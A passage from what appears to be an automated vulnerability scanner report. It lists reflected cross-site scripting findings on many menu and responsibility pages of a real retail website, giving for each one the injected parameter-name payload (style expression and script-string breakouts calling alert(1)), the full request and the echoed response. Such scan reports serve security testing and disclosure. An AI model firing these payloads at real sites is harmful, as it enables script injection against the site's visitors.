This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style%3d"x%3aexpression(alert(1))"9a2157818d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:21 GMT
Connection: close
Content-Length: 42265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style="x:expression(alert(1))"9a2157818d9=1"/>
...[SNIP]...

2.278. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1782"style%3d"x%3aexpression(alert(1))"c12556678ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1782"style="x:expression(alert(1))"c12556678ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style%3d"x%3aexpression(alert(1))"c12556678ba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:15 GMT
Connection: close
Content-Length: 42828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style="x:expression(alert(1))"c12556678ba=1"/>
...[SNIP]...

2.279. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 367b2"style="x:expression(alert(1))"e74a53c9b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:00 GMT
Connection: close
Content-Length: 43358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style="x:expression(alert(1))"e74a53c9b86=1"/>
...[SNIP]...

2.280. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdb42"style="x:expression(alert(1))"28976a77c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:26 GMT
Connection: close
Content-Length: 42483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style="x:expression(alert(1))"28976a77c79=1"/>
...[SNIP]...

2.281. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/dark-cherry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5726"style%3d"x%3aexpression(alert(1))"71244ff225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5726"style="x:expression(alert(1))"71244ff225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style%3d"x%3aexpression(alert(1))"71244ff225=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:50 GMT
Connection: close
Content-Length: 41443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style="x:expression(alert(1))"71244ff225=1"/>
...[SNIP]...

2.282. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/greek-yogurt-honey-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54f34"style="x:expression(alert(1))"898a6039ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:03 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style="x:expression(alert(1))"898a6039ac9=1"/>
...[SNIP]...

2.283. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74433"style%3d"x%3aexpression(alert(1))"de32106119b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74433"style="x:expression(alert(1))"de32106119b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style%3d"x%3aexpression(alert(1))"de32106119b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:15 GMT
Connection: close
Content-Length: 41501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style="x:expression(alert(1))"de32106119b=1"/>
...[SNIP]...

2.284. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 604b3"style="x:expression(alert(1))"1631ed89de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/nutrition?604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:13 GMT
Connection: close
Content-Length: 49499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?604b3"style="x:expression(alert(1))"1631ed89de3=1"/>
...[SNIP]...

2.285. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 460c8"style="x:expression(alert(1))"93db86d9ebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/nutrition/20-under-200?460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:55 GMT
Connection: close
Content-Length: 38413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?460c8"style="x:expression(alert(1))"93db86d9ebc=1"/>
...[SNIP]...

2.286. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d273"style%3d"x%3aexpression(alert(1))"805418c9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d273"style="x:expression(alert(1))"805418c9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/nutrition/35-under-350?4d273"style%3d"x%3aexpression(alert(1))"805418c9f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:42 GMT
Connection: close
Content-Length: 40944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?4d273"style="x:expression(alert(1))"805418c9f1=1"/>
...[SNIP]...

2.287. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d09aa"style="x:expression(alert(1))"81477c5bd4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility?d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:26 GMT
Connection: close
Content-Length: 60882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility?d09aa"style="x:expression(alert(1))"81477c5bd4b=1" />
...[SNIP]...

2.288. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ef5"%3balert(1)//49dd8543659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82ef5";alert(1)//49dd8543659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility?82ef5"%3balert(1)//49dd8543659=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:28 GMT
Connection: close
Content-Length: 60787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
xt/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759748001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility?82ef5";alert(1)//49dd8543659=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.289. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372ca"style="x:expression(alert(1))"73e95ed1bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community?372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:40 GMT
Connection: close
Content-Length: 40476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community?372ca"style="x:expression(alert(1))"73e95ed1bd6=1"/>
...[SNIP]...

2.290. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656dc"style="x:expression(alert(1))"0bb7acaed5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community/community-service?656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:03 GMT
Connection: close
Content-Length: 37533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?656dc"style="x:expression(alert(1))"0bb7acaed5f=1"/>
...[SNIP]...

2.291. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/ethos-water-fund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e52"style%3d"x%3aexpression(alert(1))"55e877cb972 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81e52"style="x:expression(alert(1))"55e877cb972 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/community/ethos-water-fund?81e52"style%3d"x%3aexpression(alert(1))"55e877cb972=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
